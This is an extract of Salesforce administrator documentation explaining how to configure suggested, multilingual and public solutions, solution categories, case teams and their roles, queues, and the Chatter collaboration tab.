The solutions import wizard includes options to import master and translated solutions and associate them with each
other.

To learn more about enabling multilingual solutions, see Enabling Multilingual Solutions on page 2301.

See Also:
Categorizing Solutions
Creating Solutions
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Suggested Solutions Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable suggested solutions:

“Manage Self-Service Portal”

AND

“Customize Application”

To modify Self-Service pages:

The suggested solutions feature displays up to ten relevant solutions that may help users and customers solve a particular case
from the case detail page, Salesforce Customer Portal, or the Self-Service portal.

Suggested solutions can lower support costs by:

• Reducing the time it takes for customer support reps to solve cases

• Improving customer support reps' productivity by offering them proactive access to all solutions for any case

• Enabling customers to solve and close their own cases

The solutions displayed are not simply found via a keyword search. Rather, the following variables are entered into a formula
that automatically scores the relevancy of each solution to the particular case:

• Word frequency in all solutions

• Word frequency in similar cases with related solutions

• Proximity of the keywords within the solutions

• Word similarities to self-closed cases and solutions rated useful by Self-Service users

• The number of additional cases associated with a solution

You can enable suggested solutions for the following:

Cases tab

Users can click View Suggested Solutions from the case detail page to view a list of solutions relevant to their case. If
multilingual solutions is enabled for your organization, search results return solutions in all languages that have matching
keywords. However, search results across all languages might not be reliable because terms searched from one language
to another are processed differently.

Customer Portal and Self-Service portal

Customers can view solutions relevant to their case when they submit a case or view cases online.

Customers can self-close their cases using suggested solutions.

When customers log new cases or click the View Suggested Solutions button on an existing case in the Customer Portal
or Self-Service portal, a list of suggested solutions is displayed, including solutions in multiple languages for organizations
with multilingual solutions enabled. When customers select a solution from the list, they can click Yes after Does this
Solution help you answer your question? and then select a reason as to why they closed their case. The case will close
with an indication on the Closed by Self-Service User case field. If the customer clicks No, they will be returned

2296

Suggested Solutions OverviewAdding Solutions



to the list of suggested solutions. If no suggested solutions are found, the Suggested Solutions Page is bypassed, and the
customer is directed to their case.

Case auto-response rules and emails

Your support team can help customers solve their own cases without the assistance of customer support reps. Simply
create email auto-responses for cases submitted via email, Web-to-Case, or the Self-Service portal. Within the
auto-response email template, include the suggested solutions merge field, {!Case_Suggested_Solutions}, which
provides outbound emails with direct links to the subject and description of each solution that may help customers answer
their inquiries.

Note: Sending mass emails using templates with the suggested solutions merge field could take several minutes
and is not recommended.

The Closed by Self-Service User field, along with a Closed When Created field, can be added to case page layouts.
These fields are automatically set by Salesforce and cannot be modified. You can run reports on the Closed by Self-Service
User and Closed When Created fields to see how cases have been closed.

• Report on the Closed by Self-Service User field to see how many cases have been closed by users via suggested
solutions on the Self-Service portal

• Report on the Closed When Created field to see how many cases have been immediately saved and closed upon creation
by support reps.

Note:

• Suggested solutions does not display Salesforce Knowledge articles.

• Suggested solutions is not available for the public solutions because public solutions users do not have an
authenticated login that allows them to create or access cases.

See Also:
Customizing Support Settings
Multilingual Solutions Overview

Customizing Solution Settings
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To change solution settings:

To customize solution settings:

1. From Setup, click Customize > Solutions > Solution Settings.
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2. Click Edit.
3. Select Enable Solution Browsing to turn on the ability to browse for and find solutions by category.

This setting enables solution browsing on the Solutions tab, Customer Portal, and when solving a case.

4. Select Enable Multilingual Solutions to turn on the ability for users to translate solutions into multiple languages.

You can deselect the Enable Multilingual Solutions checkbox at any time, but deselecting it removes all associations
between master and translated solutions and automatically disables the Enable Multilingual Solution Search
in Self Service Portal and Enable Multilingual Solution Search for Public Solutions settings.
If you select the Enable Multilingual Solutions checkbox again, the associations between master and translated
solutions are restored.

5. Select Enable Multilingual Solution Search in Self-Service Portal to add a language drop-down list
to the Self-Service portal that automatically restricts search results to solutions that match the Self-Service portal user’s
language. From the language drop-down list, Self-Service portal users can choose whether to search for solutions in a
specific language or any language supported by Salesforce.

Deselecting this checkbox removes the language drop-down list from the Self-Service portal, and search results include
solutions in all languages, regardless of the Self-Service portal user's language.

6. Select Enable Multilingual Solution Search for Public Solutions to add a language drop-down list to
public solutions so that public solutions users can choose which language to search for solutions. From the language
drop-down list, public solutions users can choose whether to search for solutions in a specific language or any language
supported by Salesforce.

Deselecting this checkbox removes the language drop-down list from public solutions, and search results include solutions
in all languages.

7. Select Enable HTML Solutions to create and display solutions in HTML. When enabled, solutions appear in HTML
in Salesforce, public solutions, Self-Service portal, and Salesforce Customer Portal. Using HTML Solutions allows users
to easily format solution details by changing fonts and colors, and adding images and hyperlinks.

Warning:  Once you select Enable HTML Solutions, you cannot disable it.

8. Select Solution Summary to display up to 150 characters of the solution details in the solution search results. Deselecting
this checkbox removes the solution summary from the results.

9. Select Inline Category Breadcrumbs to display up to 150 characters of the breadcrumb trail of categories to which
the solution belongs in the search results. Deselecting this checkbox removes the breadcrumbs from the results.

10. Click Save.
11. To enable solution browsing by customers in public solutions or your Self-Service portal, see Enabling Public Solutions

on page 2303 and Enabling Self-Service Features and Settings on page 1996.

In addition, you can customize the top-level category accessible by public solutions and Self-Service users. You do not
need to modify this setting if you want customers to view all categories and all solutions that are visible in the Self-Service
portal or visible in public solutions.
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Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

See Also:
Categorizing Solutions
Managing Solution Categories
Enabling Multilingual Solutions

Getting Started with Categories
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Categories”To create or change solution categories:

Follow these steps to ensure a successful rollout of solutions:

1. Plan which categories your support team needs.

Keep in mind that you can also allow customers to find solutions by category in public solutions and your Self-Service
portal. You can specify that customers can view only solutions in a particular category and all of its subcategories.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

2. Define your categories; see Defining Solution Categories on page 2300.
3. Categorize your solutions; see Categorizing Solutions on page 1846. Administrators, and users with the “Manage Categories”

permission, can categorize solutions prior to enabling solution categories for the entire organization.
4. Create a custom report of type Solution Categories to verify that all solutions are categorized appropriately. To find any

uncategorized solutions, use the advanced report filters; choose the Category Name field and the “equals” operator, and
leave the third field blank. Administrators, and users with the “Manage Categories” permission, can create solution category
reports prior to enabling solution categories for the entire organization.

5. Enable solution category browsing for the Solutions tab; see Customizing Solution Settings on page 2297.
6. Enable solution category browsing for customers using public solutions and your Self-Service portal. See Enabling Public

Solutions on page 2303 and Enabling Self-Service Features and Settings on page 1996.
7. Specify the top-level category accessible by customers using public solutions and your Self-Service portal. This is useful if

you want to have certain categories available only to internal staff.
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Leave this blank if you want customers to view all categories and all solutions that are visible in Self-Service portal or visible
in public solutions.

See Also:
Managing Solution Categories

Defining Solution Categories
Begin by creating your solution categories. The All Solutions category is automatically created for you as the top of your
solution hierarchy. Users cannot add solutions to this category or translate it.

1. From Setup, click Customize > Solutions > Solution Categories.
2. Click Add Category to create a subcategory below a specific category.
3. Enter the category name. Category names cannot include the backslash “\” character.
4. Select a different parent category, if desired. The parent category is the category directly above this category in the hierarchy.
5. Select a sort order for any subcategories you create under this category.

• Choose Alphabetical Order to sort subcategories alphabetically.
• Choose Custom Order to sort subcategories in the order you specify; see Adding and Sorting Subcategories on page

2300.

6. Click Save.
7. After creating categories, categorize your solutions. See Categorizing Solutions on page 1846. Administrators, and users

with the “Manage Categories” permission, can categorize solutions prior to enabling solution categories for the entire
organization.

8. Then, after categorizing solutions, turn on solution category browsing on the Solutions tab. See Customizing Solution
Settings on page 2297.

9. To enable solution category browsing for the public knowledge base or your Self-Service portal, see Enabling Public
Solutions on page 2303.

Editing and Deleting Categories

From the list of solution categories, you can:

• Click Edit to modify the category name, parent category, or sort order.
• Click Del to delete the category. The solutions associated with the category are not deleted.

Note:  You cannot delete a category in use by a Salesforce Customer Portal. For more information, see Enabling
Customer Portal Login and Settings on page 1937.

• Click the category name to view the category details.

Adding and Sorting Subcategories

From a category detail page, you can:

• Click New to add a subcategory below the category.
• Enter a custom sort order for the subcategories.
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1. Edit the category to set the Subcategory Sort Order to Custom Order.
2. Enter numbers in the Order column to specify the order of the subcategories.
3. Click Reorder.

See Also:
Categorizing Solutions

Managing Solution Categories

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Categories”To create or change solution categories:

Create solution categories so that users can group similar solutions together. Once your solutions are categorized, users can
browse for and find solutions by category from the Solutions tab or when solving a case. Customers can also browse solutions
by category in public solutions, the Self-Service portal, and the Customer Portal.

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

See Also:
Getting Started with Categories
Defining Solution Categories

Enabling Multilingual Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable multilingual solutions:

You can turn on multilingual solutions so users have the ability to translate solutions into multiple languages.
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Preparing for Multilingual Solutions

Before you enable multilingual solutions:

• Run solution reports to locate any existing solutions that are already translated and will need to be converted to translated
solutions after you enable multilingual solutions.

When multilingual solutions is enabled for the first time, all existing solutions automatically become master solutions. You
can create translated solutions from master solutions by associating a master solution without any translated solutions with
a master solution of a different language via the Master Solution lookup field.

• Translate any existing solution categories.

Translated solutions inherit the solution categories of their master solution. We recommend that you translate your solution
categories before enabling multilingual solutions and then associate solutions with each other. This will help you associate
solutions with the correct categories.

Enabling Multilingual Solutions

To enable multilingual solutions:

1. From Setup, click Customize > Solutions > Solution Settings.
2. Click Edit.
3. Select Enable Multilingual Solutions.

Optionally, select Enable Multilingual Solution Search in Self-Service Portal and Enable
Multilingual Solution Search for Public Knowledge Base to allow customers to view solution search
results in a specific language or all supported languages via a language drop-down list.

4. Click Save.
5. Customize solution page layouts to include the Master Solution Title field, Master Solution Details field,

Out-of-Date field, and the Translated Solutions related list. The Language picklist and Master Solution lookup
fields are automatically added to solution page layouts when you enable multilingual solutions.

Tip:  You can make solution edit pages easier for users to translate multilingual solutions by setting the Detail
Information section to two columns and placing the Master Solution Title and Master Solution
Details fields alongside each other. Underneath those fields, place the Solution Title and Solution
Details fields alongside each other so that users can effortlessly compare the master and translated solutions.
Note that the Master Solution Title and Master Solution Details fields display only on the translated
solution edit page.

6. Set the field-level security settings of the Master Solution lookup field to editable for profiles or permission sets with
the “Create” and “Edit” permissions on solutions.

When the Master Solution lookup field is editable, users can associate translated solutions with master solutions.

Field-level security is available in Enterprise, Unlimited, and Developer Editions only.

7. Set the field-level security settings of the Out of Date checkbox field to visible for all profiles or permission sets with
the “Read” permission on solutions.

Field-level security is available in Enterprise, Unlimited, and Developer Editions only.

8. As a best practice, add a long text area custom field to solutions called Translation Comments and include it on solution
page layouts so that users can add any comments regarding the translation of the solution. Users should include a date with
their comments so that other users can see when each comment was added.

Note: You can deselect the Enable Multilingual Solutions checkbox at any time, but deselecting it removes
all associations between master and translated solutions and automatically disables the Enable Multilingual
Solution Search in Self Service Portal and Enable Multilingual Solution Search for
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Public Solutions settings. If you select the Enable Multilingual Solutions checkbox again, the associations
between master and translated solutions are restored.

Rolling Out Multilingual Solutions

After enabling multilingual solutions:

• Associate any existing translated solutions with the appropriate master solutions.

You can do this manually using the Master Solution lookup field, or you can export a report of existing translated
solutions and then import those solutions to associate them with a master solution. For each translated solution you import,
include the 15 to 18 character Solution ID field of its master solution in a master solution column on your import file.
To view the Solution ID field for master solutions, run the Translated Solution report. If you import solutions by
mistake, you can use mass delete to remove them from your organization.

See Also:
Multilingual Solutions Overview
Categorizing Solutions

Enabling Public Solutions
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable web access to solutions:

Note:  Starting with Spring ’12, the Self-Service portal isn’t available for new organizations. Existing organizations
continue to have access to the Self-Service portal.

Using the Solutions tab, your customer support team can create solutions that people outside of your organization may find
helpful. Using HTML code supplied by Salesforce, and with the help of your website administrator, you can add a search box
and button to your website that allows your customers to search for solutions. This functionality is known as Public Solutions.

With public solutions, your customers can find answers to frequently asked questions without having to call your customer
support center. All solutions with a Status of Reviewed and the Visible in Public Knowledge Base field checked
will be available as public solutions, including any solution attachments.

Public solutions are different from the Self-Service portal and Salesforce Customer Portal because users are not required to
log in, and they can only search for solutions, not submit cases. For more information about the Self-Service and Customer
Portal, see Setting Up Self-Service on page 1995 and Setting Up Your Customer Portal on page 1928.

Note:

• The search box and button are displayed in a frame; your website must support frames in order for the solution
search feature to work.

• Suggested solutions does not display Salesforce Knowledge articles.
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To enable Web access to solutions:

1. From Setup, click Customize > Self-Service > Public Solutions.
2. Click Edit.
3. Check Public Solutions Enabled.
4. If your organization uses solution categories, check Enable Solution Browsing to allow customers to browse solutions

by category. Solution categories cannot be translated into other languages for public solutions.

If multilingual solutions is enabled for your organization, you can add a language drop-down list to public solutions so
that customers can choose which language to search for solutions. For more information, see Customizing Solution Settings
on page 2297.

5. If solution category browsing is enabled, select the Top-Level Category accessible by customers in public solutions.
Customers can view all solutions in this category and its subcategories if they are marked Visible in Public Knowledge
Base.

Leave Top-Level Category blank if you want customers to view all solutions in all categories when they are visible as
public solutions.

6. If desired, you can change the appearance of the frame on your website by specifying the Maximum Page Width and
Minimum Page Height.

7. Provide the URL of your CSS page in Style Sheet URL. The CSS file does not have to exist yet; you can download a
sample file as a starting point later, or use your own file.

8. You can change the word or phrase that is used to describe solutions in the frame in Alternative Term. Provide singular
and plural versions of the term.

9. Click Save.
10. If desired, click Download Sample CSS File to get the Salesforce style sheet.
11. Click Generate HTML.
12. Copy the resulting HTML code and click Finished.
13. Send the HTML (and the CSS file, if you downloaded it) to your website administrator to be added to your site as follows:

• Add the HTML to your Web page.
• Customize the downloaded style sheet.
• Host the style sheet in a publicly accessible location on your Web server.
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CONFIGURING SUPPORT TEAMS

Setting Up Case Teams
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

To set up case teams:

“Edit” on casesTo add team members:

A case team is a team of users that work together on a case. For example, your case team may include a support rep, support
manager, and a product manager.

Every member of a case team has a role that he or she plays for the case, such as “Customer Contact” or “Case Manager.”
Roles determine access to the case, like Read Only or Read/Write access, and whether the member in the role is visible to
users in the Customer Portal.

To set up case teams:

1. Define case team roles.
2. Add the Case Team related list to case page layouts.

The Case Team related list enables users to add case team members and predefined case teams to cases.

3. Optionally, predefine case teams so that users can easily add the users they usually work with to cases.
4. Set up workflow alerts to specify what actions on a case will send an email notification to case team members.
5. Optionally, create assignment rules so that when a case matches assignment rule criteria, a predefined case team is

automatically added to the case.

Tips on Setting Up Case Teams
Consider the following when setting up case teams:

• Case teams are not available for the partner portal.
• Customer Portal users can view the Case Team related list if it is included on case page layouts associated with their profile.

However, Customer Portal users cannot update case teams or view case team role details on cases.
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• Case teams count towards your organization's overall storage limit. Each team member on a case counts towards 2 KB of
storage space.

See Also:
Case Teams Overview

Case Teams Overview

Available in: Enterprise, Unlimited, and Developer Editions

A case team is a team of users that work together on a case. For example, your case team may include a support rep, support
manager, and a product manager.

You can build a case team on the Case Team related list of a case. When selecting a team member, choose a role to indicate
the role the person plays on the case. Case team roles determine the level of access each case team member will have to the
case. For example, you can choose a role that gives some team members Read Only access and others Read/Write access to
the case. Furthermore, administrators can set up workflow alerts to specify what actions on a case will send an email notification
to case team members. For example, an administrator could set up workflow alerts to send notifications to case team members
when a new case comment is added to a case.

Users with the “Customize Application” permission can predefine case teams. Predefined case teams can include the users
that you normally work with on your cases. Administrators have the option to create assignment rules that automatically add
predefined case teams to all cases that match assignment rule criteria.

You can filter case lists by case teams where you are a member. Simply select the My Case Teams filter on case list views.
You can also report on case teams in which you are a member. After you run a case report, select My team's cases from the
View filter.

See Also:
Setting Up Case Teams
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Defining Case Team Roles

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

To set up case teams:

“Edit” on casesTo add team members:

A case team is a team of users that work together on a case. For example, your case team may include a support rep, support
manager, and a product manager. Every member of a case team has a role that he or she plays for the case, such as “Customer
Contact” or “Case Manager.” Roles determine access to the case, like Read Only or Read/Write access, and whether the
member in the role is visible to users in the Customer Portal.

To access the Case Team Roles page, from Setup, click Customize > Cases > Case Teams > Case Team Roles. From the
Case Team Roles page, click the appropriate links to perform the following actions:

Create Team Roles

To create a case team role:

1. Click New.
2. Enter a name for the role.
3. From the Case Access picklist, select the role's level of access to cases. The possible access levels are:

DescriptionAccess Level

User can view and edit the record, and add associated
records, notes, and attachments to it.

Read/Write

User can view the record, and add associated records to it.
They cannot edit the record or add notes or attachments.

Read Only

User cannot access the record in any way.Private

4. Optionally, select Visible in Customer Portal if you want the users in this role visible to Customer Portal users
viewing cases.

Customer Portal users included in a case team can view themselves on the Case Team related list of cases, even if they are
in a role where the Visible in Customer Portal checkbox is not selected.

5. Click Save. Alternatively, click Save & New to save the role and begin creating another new role.

After you create case team roles, you can predefine case teams.
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Update Team Roles

To update a case team role:

1. Click Edit next to the name of the case team role you wish to update.
2. Update the appropriate fields.
3. Click Save.

Replace Team Roles

To replace a case team role and globally replace the role in all existing cases:

1. Click Replace next to the name of the case team role you wish to replace.
2. Choose a case team role with which to replace the existing role.
3. Click Save.

Tips on Defining Case Team Roles

Consider the following when defining case team roles:

• By default, case owners have full access to cases they own. Case team roles cannot update case owners’ access level to cases.
• You can add contacts and Customer Portal users to roles that have Read/Write access on cases. However, only contacts

enabled as Customer Portal users can access cases, as contacts cannot log in to Salesforce.
• Currently, you can create an unlimited amount of roles for case teams. Yet, because case team roles cannot be deleted, we

recommend that you create no more than 20 roles so that users do not have too many roles to choose from when working
with case teams.

• If your organization has only one case team role, you cannot replace it.

See Also:
Case Teams Overview
Setting Up Case Teams

Predefining Case Teams

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

To set up case teams:

“Edit” on casesTo add team members:

A case team is a team of users that work together on a case. For example, your case team may include a support rep, support
manager, and a product manager.
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After you define case team roles, you can predefine case teams so that users can quickly add a team of specific users to the
Case Team Members related list on cases.

To access the Predefined Case Teams page, from Setup, click Customize > Cases > Case Teams > Predefined Case Teams.
From the Predefined Case Teams page, click the appropriate links to perform the following actions:

Create Predefined Case Teams

To create a predefined case team:

1. Click New.
2. Enter a name for the team.
3. Optionally, enter a description for the team.
4. Optionally, add team members:

a. Select the type of user from the Team Member picklist, either User, Contact, or Portal User; then click the Lookup
icon ( ) to choose a specific user to add to the team.

Contacts can only view cases via a Customer Portal.

b. Select the case team role to apply to the team member from the Member Role picklist.

Every member of a case team has a role that he or she plays for the case, such as “Customer Contact” or “Case Manager.”
Roles determine access to the case, like Read Only or Read/Write access, and whether the member in the role is visible
to users in the Customer Portal.

5. Click Save.

Add Team Members to Predefined Case Teams

To add a new member to a predefined case team:

1. Select the name of the predefined case team.
2. Click Add Team Member.
3. Select the type of user from the Team Member picklist, either User, Contact, or Portal User; then click the Lookup icon

( ) to choose a specific user to add to the team.

Contacts can only view cases via a Customer Portal.

4. Select the case team role to apply to the team member from the Member Role picklist.

Every member of a case team has a role that he or she plays for the case, such as “Customer Contact” or “Case Manager.”
Roles determine access to the case, like Read Only or Read/Write access, and whether the member in the role is visible to
users in the Customer Portal.

5. Click Save.

Update Predefined Case Teams

To update a predefined case team:

1. Click Edit next to the name of the predefined case team you wish to update.

Optionally, click Del to delete the predefined case team.

When you delete a predefined case team, the case team is automatically removed from all cases with which it is associated.
Furthermore, you cannot retrieve deleted predefined case teams from the Recycle Bin.

2. Update the appropriate fields.
3. Click Save.
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Update Predefined Case Teams Members

To update the team members on a predefined case team:

1. Select the name of the predefined case team.
2. Optionally, click:

• A member's name to view that user's details.

If you have the “Manage Users” permission, you can update the user's details and reset the user's password from the
user's detail page.

• A member's case team role to update the details of the case team role.

Every member of a case team has a role that he or she plays for the case, such as “Customer Contact” or “Case Manager.”
Roles determine access to the case, like Read Only or Read/Write access, and whether the member in the role is visible
to users in the Customer Portal.

3. Click Edit.
4. Optionally:

• Click the Remove link next to an existing team member to remove him or her from the case team.

When you remove a member from a predefined case team, the user is automatically removed from all cases with which
he or she is a member of that case team.

• Click the Add 1 Row link to add a new row with which you can add a case team member.
• On existing team member rows, you can:

◊ Select the type of user from the Team Member picklist, either User, Contact, or Portal User; then click the Lookup
icon ( ) to choose a specific user to add to the team.

Contacts can only view cases via a Customer Portal.

◊ Select the case team role to apply to the team member from the Member Role picklist.

Every member of a case team has a role that he or she plays for the case, such as “Customer Contact” or “Case
Manager.” Roles determine access to the case, like Read Only or Read/Write access, and whether the member in
the role is visible to users in the Customer Portal.

5. Click Save.

Tips on Predefining Case Teams

Consider the following when predefining case teams:

• You cannot delete a predefined case team if it is associated with an assignment rule. To delete the predefined case team,
you must first remove it from any assignment rules.

• When you delete a predefined case team, the case team is automatically removed from all cases with which it is associated.
Furthermore, you cannot retrieve deleted predefined case teams from the Recycle Bin.

• When you remove a member from a predefined case team, the user is automatically removed from all cases with which he
or she is a member of that case team.

See Also:
Case Teams Overview
Setting Up Case Teams
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Setting Up Email Alerts for Case Team Members

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”

AND

“Manage Users”

To set up case teams:

“Customize Application”To create or change workflow rules:

“Customize Application”To create or change email alerts:

A case team is a team of users that work together on a case. For example, your case team may include a support rep, support
manager, and a product manager.

You can set up email alerts for case team members so that each time a case is updated or created, team members associated
with the case are automatically notified.

To set up email alerts for members on case teams:

1. Create email templates with which to notify case team members.

Optionally, enter merge fields in the template subject and text body. These fields will be replaced with information from
your records when you send an email.

2. Set up workflow rules that specify what actions on a case trigger email notifications to case team members:

a. From Setup, click Create > Workflow & Approvals > Workflow Rules.
b. On the workflow rules list page, click New Rule.
c. Choose Case from the Select object picklist and click Next.
d. Enter a rule name.
e. Optionally, enter a description for the rule.
f. Choose the evaluation criteria.

We recommend that you set the evaluation criteria to Evaluate the rule when a record is: created,
and every time it’s edited because this ensures that every case is evaluated as to whether it should trigger
notifications to case team members.

g. Enter your rule criteria.

We recommend that you choose criteria are met and select the filter criteria that a case must meet to trigger
notifications to case team members. For example, set the filter to Case: Status equals New if you want case
team members to receive a notification each time a case's status is set to New.

h. Optionally, enter filter logic.
i. Click Save & Next.

3. Add email alerts to the workflow rule so that notifications are sent to case team members when actions on cases match
rule criteria:
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a. Click Add Workflow Action and choose New Email Alert from the drop-down button.
b. Enter a description for the email alert.

The object is read only if the new email alert is associated with a workflow rule for a particular object.

c. Choose an email template.
d. Select the type of recipients who you want to receive this email alert.

Optionally, select Case Team from the Recipient Type picklist to choose all users with a particular case team role
as recipients.

The recipients that match your search results appear in the Available Recipients list.

e. Select the recipients who you want to receive this email alert in the Available Recipients list and click Add to add them
to the Selected Recipients list.

f. Optionally, enter up to five additional email addresses.
g. Click Save.

4. Activate the workflow rule and its associated email alert:

a. From Setup, click Create > Workflow & Approvals > Workflow Rules
b. Click Activate next to the name of the rule.

Note:  You can click Deactivate at any time to prevent the rule from firing when its conditions are met;
however, if you deactivate a rule that has pending actions, Salesforce completes those actions as long as the
record that triggered the rule is not updated.

See Also:
Setting Up Case Teams
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Creating Queues
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”

AND

“Manage Public List Views”

To create or change queues:

“Customize Application”

AND

“Manage Public List Views” and “Manage Users”

To create or change queues created by other users:

1. From Setup, click Manage Users > Queues.
2. Click New.
3. Enter the Label and Queue Name. The Label is the queue label as it appears on the user interface. The Queue Name is a

unique name used by the API and managed packages, and can only contain alphanumeric characters and underscores.
4. Choose email notification settings for the queue:

You MustTo Notify

Add an email address to Queue Email.

You can add an email address for an individual user or an
email distribution list.

One email address when new records are placed in the queue

Leave Queue Email blank.All queue members individually when new records are placed
in the queue

Add an email address to Queue Email and check Send
Email to Members.

All queue members and the Queue Email individually
when new records are placed in the queue

5. If your organization uses divisions, select the default division for the queue.

This determines the division for a record when it's assigned to the queue via assignment rules or a manual change of
ownership. Note that cases inherit the division of the contact they're related to, or they're assigned to the default global
division if no contact is specified.

6. Choose the objects available to the queue.
7. Choose queue members.

You can select individual users, roles, public groups, territories, connections, or partner users. Only queue members and
users above them in the role hierarchy can take ownership of records in the queue, depending on your organization's sharing
settings.
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8. Click Save.

Tips on Creating Queues
• When you create a queue, Salesforce automatically creates a corresponding list view. Users can access the queue list view

from the Cases, Leads, Service Contracts or custom object tabs. Only queue members and users above them in the role
hierarchy have access to the queue list view, depending on your sharing settings.

• After you have defined a queue, you can set up lead or case assignment rules to automatically reassign ownership of leads
and cases to the queue.

• After you have defined a queue for a custom object, you can set up a workflow rule that automatically reassigns ownership
of custom object records to the queue via a field update on the record owner field.

See Also:
Queues Overview
Viewing and Editing Queues
Managing Queues

Queues Overview

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Lead queues, case queues, and service contract queues are not available in Database.com

User Permissions Needed

“Customize Application”

AND

“Manage Public List Views”

To create or change queues:

“Customize Application”

AND

“Manage Public List Views” and “Manage Users”

To create or change queues created by other users:

Queues help your teams manage leads, cases, service contracts, and custom objects. Once records are placed in a queue manually
or through an automatic case or lead assignment rule, records remain there until they're assigned to a user or taken by one of
the queue members. Any queue member or users above them in the role hierarchy can take ownership of records in a queue.
For example:

Lead queues

Help you manage the distribution of leads. For example, you may have a lead queue for a Western Region team and one
for an Eastern Region team. You can put leads in different queues, either manually or automatically via a lead assignment
rule as leads are imported, created or edited manually, or captured from the Web. Make salespeople members of one or
more lead queues.
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Case queues

Help you manage your support workload and differentiate cases based on support levels. With queues, you can ensure
that cases are resolved quickly even if a specific user is on vacation. By creating queues for different support levels, such
as Gold Service and Silver Service, cases are automatically prioritized. You can put cases in different queues, either
manually or automatically via a case assignment rule as cases are generated from the Web or created manually. Make
support agents members of case queues.

Knowledge article version queues

Help you manage the distribution of versions of Salesforce Knowledge articles for translation. For example, if multiple
languages are used for your knowledge base, you can assign new versions of articles to a queue of users who can translate
the article into a specific language.

Service contract queues

Help you manage the distribution of service contracts. For example, you may have a dedicated group of users who review
service contracts. When a service contract is created, assign it to a queue so queue members can review the service contract.

Custom object queues

Help you manage the distribution of custom object records. When a custom object record is created, manually assign it
to a queue so that the users assigned to the queue can access it and take ownership of it.

See Also:
Creating Queues
Viewing and Editing Queues
Managing Queues

Viewing and Editing Queues

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”

AND

“Manage Public List Views”

To create or change queues:

“Customize Application”

AND

“Manage Public List Views” and “Manage Users”

To create or change queues created by other users:

To view or edit a queue:

1. From Setup, click Manage Users > Queues and select the queue name.
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2. Click:

• Edit to make changes to the queue.
• Delete to remove the queue.

You can't delete a queue if it's in an assignment rule or has records in it.

• View All Users to view the queue's members plus any users who have the same access as queue members because they're
higher in your organization's role hierarchy.

You can click View Queue Members to return to the Queue Members related list.

3. If you edited the queue, click Save.

See Also:
Queues Overview
Creating Queues
Managing Queues

Managing Queues

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”

AND

“Manage Public List Views”

To create or change queues:

“Customize Application”

AND

“Manage Public List Views” and “Manage Users”

To create or change queues created by other users:

To view and manage queues, from Setup, click Manage Users > Queues.

• To create a queue, click New.

• To edit a queue, click Edit next to the queue name.

• To delete a queue, click Del next to the queue name.
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• To view details about a queue, including the queue's members, click the queue's name.

See Also:
Queues Overview
Viewing and Editing Queues
Creating Queues
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Welcome, Collaboration Tool Users
No man is an island, even in Salesforce. Complete tasks quickly and efficiently by collaborating with people either inside or
outside of your organization.

Refer to this documentation for information on collaboration tools like Chatter, Salesforce CRM Content, and even documents.
There’s no limit to what you can accomplish with others—figure out the best way to do it here.

COLLABORATE WITHIN YOUR COMPANY

SHARE UPDATES WITH PEOPLE (CHATTER)

Chatter Overview
Chatter is a Salesforce collaboration application that helps you connect with people and share business information securely
and in real time.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Use Chatter features like feeds, profiles, groups, and more to share information, collaborate, and keep up with the latest updates
in your company.

Chatter works in accordance with all of the security and permission settings in your Salesforce organization. Chatter is enabled
by default for organizations created after June 22, 2010. For existing organizations, your administrator must enable Chatter.
You can access the Chatter app in the app menu in the top right corner of any page. If your administrator added Chatter tabs
to other apps and you previously customized your display, you need to add the tabs manually.

Some third-party Web browser plug-ins and extensions can interfere with the functionality of Chatter. If you experience
malfunctions or inconsistent behavior with Chatter, disable all of the Web browser's plug-ins and extensions and try again.

Chatter is not supported:

• Using Microsoft® Internet Explorer version 6.0

• For external users in Customer Portals or partner portals

• In the Console tab

COLLABORATE WITH EVERYONE
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Additionally we reserve the right to enforce limits on:

• The length of time that posts, comments, and tracked field changes are stored on the Salesforce servers.

• The number of posts, comments, and tracked field changes available in the Chatter feed. Currently tracked fields without
likes or comments are removed from the feed after 45 days.

• The number of email notifications that can be sent per organization per hour.

These limits are subject to change at any time. Contact salesforce.com for more information.

GET STARTED WITH CHATTER

Chatter Tab Overview
The Chatter tab is your collaboration home base and gives you instant access to most of the collaboration features in Chatter.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

From the Chatter tab you can:

• Make a post that’s shared with people who follow you, or comment on someone else’s post.

• Like posts or comments to show your support.

• Share a post to your profile or to a group, or send a link to the post to other Chatter users in an email or instant message.

• View, filter, and sort your feed on the left side to view posts from people and records you follow and groups you’re a member
of, posts that mention you, posts you bookmarked, or all posts from your company.

• Search the feed to quickly find information in the feed posts and comments on the Chatter tab.

• Bookmark a post to keep track of future comments on the post, or to remember to follow up on the post later.

• Add topics to a post to categorize the post and give it more visibility.

• Access your people, groups, files, and topics lists.

• View or update your profile, such as your profile photo or your contact information.

• Read or send private messages that are only visible to certain people.

• Access your favorites to see the latest posts and comments for your favorite topics, list views, and Chatter feed searches.

• View your recommendations for people, groups, files, and records that closely relate to your job and interests.

• View trending topics that people are discussing in Chatter right now.

